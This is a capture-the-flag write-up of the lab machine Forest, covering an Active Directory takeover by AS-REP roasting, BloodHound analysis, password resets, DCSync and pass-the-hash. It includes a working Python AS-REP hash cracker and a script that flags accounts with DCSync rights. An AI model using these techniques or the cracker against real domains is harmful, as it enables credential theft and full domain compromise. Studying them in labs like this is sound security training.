Forest

Summary

  • The domain was exposed to AS-REP roasting: the svc-alfresco account had "Do not require Kerberos preauthentication" set, so an unauthenticated client can request an AS-REP for it and attack the encrypted part offline.

  • Extracted the AS-REP hash with impacket's GetNPUsers and cracked it with John the Ripper, recovering the password s3rvice.

  • Logged in as svc-alfresco over WinRM with Evil-WinRM and read the user flag.

  • Ran BloodHound and found:

    • svc-alfresco owns the user objects kyle and rdiaz.

    • kyle holds DCSync rights over the domain.

  • Reset the passwords of kyle and rdiaz with rpcclient.

  • Ran a DCSync as kyle to dump the Administrator NTLM hash.

  • Passed that hash to Evil-WinRM to get an Administrator shell and read the root flag.


Enumeration

sudo nmap -A -sC -sN -p- -oN forest_tcp.nmap -T4 10.10.10.161

Note on the flags: -sN requests a TCP Null scan, which is unreliable against Windows (a Windows host answers every Null probe with RST, so no port shows as open); a SYN scan (-sS, the default when nmap runs as root) is the right choice here. -A already enables -sC, so that flag is redundant.

Enumerating SMB

crackmapexec smb 10.10.10.161 --users

Discovered valid users:

Checked for AS-REP roasting with impacket's GetNPUsers, which asks the KDC for an AS-REP for each known user and records the ones that come back without preauthentication:

Found an AS-REP hash for svc-alfresco:

Cracked it with John the Ripper:

Recovered password: s3rvice
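What John is actually doing when it cracks that hash, as an added example (not the writeup's own code): the AS-REP enc-part for an etype-23 account is RC4-HMAC under the user's NT hash, so each candidate password is turned into an NT hash, the key-usage-8 keys are derived, and the HMAC-MD5 checksum is recomputed. The MD4 and RC4 here are pure Python so the block runs offline; the hash line is constructed with the same routine under the password s3rvice (not captured from the box), and the "password" NT-hash vector is the well-known value used to self-check MD4.

```python
"""Offline verification of an AS-REP roast hash (etype 23, RC4-HMAC), as John/hashcat do it.

Added example, not the writeup's code. SAMPLE_HASH is CONSTRUCTED with build_sample_hash(),
not captured from Forest; the EncASRepPart payload is a stand-in byte string.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KRB5_USAGE_AS_REP_ENC_PART = 8  # Microsoft keys the AS-REP enc-part with usage 8 (RFC 4757)


def _rol(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, additive constant, per-step shifts, message-word order)
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, w in enumerate(order):
                aa = _rol(aa + fn(bb, cc, dd) + words[w] + k, shifts[i % 4])
                aa, bb, cc, dd = dd, aa, bb, cc  # rotate registers: ABCD -> DABC -> CDAB -> BCDA
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf||pt); ct = RC4(HMAC(K1, checksum), conf||pt)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """The cracker's inner loop: decrypt under the candidate key and check the MAC."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, data), checksum)


def parse_asrep_hash(line: str):
    """Accepts GetNPUsers' hashcat form ($krb5asrep$23$user@REALM:cksum$edata) and john form (no 23$)."""
    if not line.startswith("$krb5asrep$"):
        raise ValueError("not an AS-REP roast hash")
    body = line[len("$krb5asrep$"):]
    if body.startswith("23$"):
        body = body[3:]
    principal, _, rest = body.partition(":")
    cksum_hex, _, edata_hex = rest.partition("$")
    return principal, bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex)


def crack_asrep(line: str, wordlist):
    """Return the first wordlist entry whose NT hash verifies the AS-REP checksum, else None."""
    _principal, checksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KRB5_USAGE_AS_REP_ENC_PART, checksum, edata):
            return candidate
    return None


def build_sample_hash(principal: str, password: str) -> str:
    """Construct a hash line keyed the way a KDC would key the AS-REP enc-part (sample data only)."""
    fake_enc_part = b"constructed EncASRepPart stand-in, not a real ticket"
    blob = rc4_hmac_encrypt(nt_hash(password), KRB5_USAGE_AS_REP_ENC_PART, fake_enc_part, bytes(range(8)))
    return f"$krb5asrep$23${principal}:{blob[:16].hex()}${blob[16:].hex()}"


SAMPLE_HASH = build_sample_hash("svc-alfresco@HTB.LOCAL", "s3rvice")  # constructed, see above

if __name__ == "__main__":
    print(crack_asrep(SAMPLE_HASH, ["Password1", "Winter2019!", "s3rvice"]))
```

The verification step costs one MD4, three HMAC-MD5s and one RC4 pass per candidate, which is why this etype cracks so quickly; an account restricted to AES etypes would force a PBKDF2-based key derivation per guess instead.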


Initial Foothold

Used Evil-WinRM to connect to WinRM (TCP 5985) as svc-alfresco with the recovered password:

User shell landed — ✅ Got user flag!


Privilege Escalation

Collected domain data with bloodhound-python as svc-alfresco and loaded it into BloodHound:

Key Finding:

  • svc-alfresco owns:

    • kyle (has DCSync rights: both replication extended rights on the domain object)

    • rdiaz (has special access in Forest.HTB.local)
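A way to pull those two findings straight out of the collector's JSON without the GUI, as an added example that is not the writeup's code. The JSON is constructed in the shape bloodhound-python writes for BloodHound 4 (data[].ObjectIdentifier, Properties.name, Aces[] with PrincipalSID/RightName); the SIDs, names and ACEs mirror the page's findings but are invented, and rdiaz is deliberately given only GetChanges so the check for an incomplete DCSync grant is exercised.

```python
"""Triage bloodhound-python JSON for Owns edges from the foothold user and DCSync on the domain.

Added example, not the writeup's code. All JSON below is CONSTRUCTED; SIDs and names are invented.
"""
import json
from collections import defaultdict

DOMAIN = "S-1-5-21-1000000000-2000000000-3000000000"  # invented domain SID
SVC_ALFRESCO, KYLE, RDIAZ, DOMAIN_ADMINS = (DOMAIN + r for r in ("-1147", "-1148", "-1149", "-512"))


def _obj(sid, name, aces):
    return {"ObjectIdentifier": sid, "Properties": {"name": name}, "Aces": aces}


def _ace(principal, right, ptype="User"):
    return {"PrincipalSID": principal, "PrincipalType": ptype, "RightName": right, "IsInherited": False}


USERS_JSON = json.dumps({"data": [
    _obj(SVC_ALFRESCO, "SVC-ALFRESCO@HTB.LOCAL", []),
    _obj(KYLE, "KYLE@HTB.LOCAL", [_ace(SVC_ALFRESCO, "Owns")]),
    _obj(RDIAZ, "RDIAZ@HTB.LOCAL", [_ace(SVC_ALFRESCO, "Owns")]),
], "meta": {"type": "users", "count": 3, "version": 4}})

GROUPS_JSON = json.dumps({"data": [_obj(DOMAIN_ADMINS, "DOMAIN ADMINS@HTB.LOCAL", [])],
                          "meta": {"type": "groups", "count": 1, "version": 4}})

DOMAINS_JSON = json.dumps({"data": [_obj(DOMAIN, "HTB.LOCAL", [
    _ace(DOMAIN_ADMINS, "GenericAll", "Group"),
    _ace(KYLE, "GetChanges"),
    _ace(KYLE, "GetChangesAll"),
    _ace(RDIAZ, "GetChanges"),  # constructed: one half of the pair only, not enough to DCSync
])], "meta": {"type": "domains", "count": 1, "version": 4}})

# DCSync needs BOTH replication extended rights; these broader rights contain them implicitly.
DCSYNC_PAIR = {"GetChanges", "GetChangesAll"}
DCSYNC_IMPLIED = {"GenericAll", "AllExtendedRights"}
# With these on the domain object a principal can grant itself DCSync first (the WriteDacl path).
CAN_GRANT = {"WriteDacl", "WriteOwner", "Owns"}


def objects(raw: str):
    return json.loads(raw)["data"]


def sid_names(*collections):
    """SID -> display name across any number of collector files."""
    return {o["ObjectIdentifier"]: o["Properties"]["name"] for coll in collections for o in coll}


def owned_by(principal_sid, users):
    """Names of user objects whose DACL carries an Owns edge from principal_sid."""
    return sorted(u["Properties"]["name"] for u in users
                  if any(a["RightName"] == "Owns" and a["PrincipalSID"] == principal_sid for a in u["Aces"]))


def dcsync_report(domains, names):
    """Per domain: who can DCSync now, who holds only part of the pair, who could grant it to themselves."""
    report = {}
    for dom in domains:
        rights = defaultdict(set)
        for ace in dom["Aces"]:
            rights[ace["PrincipalSID"]].add(ace["RightName"])
        full = {sid for sid, r in rights.items() if DCSYNC_PAIR <= r or r & DCSYNC_IMPLIED}
        partial = {sid for sid, r in rights.items() if r & DCSYNC_PAIR} - full
        grant = {sid for sid, r in rights.items() if r & CAN_GRANT}
        label = lambda sids: sorted(names.get(s, s) for s in sids)
        report[dom["Properties"]["name"]] = {"dcsync": label(full), "partial": label(partial),
                                             "can_grant_dcsync": label(grant)}
    return report


if __name__ == "__main__":
    names = sid_names(objects(USERS_JSON), objects(GROUPS_JSON))
    print("svc-alfresco owns:", owned_by(SVC_ALFRESCO, objects(USERS_JSON)))
    print(dcsync_report(objects(DOMAINS_JSON), names))
```

The "partial" bucket is the caveat worth checking before resetting anyone's password: a principal with only GetChanges (or only GetChangesAll) will fail a DCSync, and the "can_grant_dcsync" bucket is the WriteDacl/WriteOwner route that needs an extra ACL edit before the dump works.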

Used rpcclient to reset the passwords of the owned users (a destructive change on a real engagement, since the original passwords cannot be restored; record it):

Performed a DCSync as kyle:

Dumped the Administrator's NTLM hash:

Passed the hash to Evil-WinRM (no password needed; the NT hash authenticates over NTLM):

Got an Administrator shell 🎯 and grabbed root.txt!
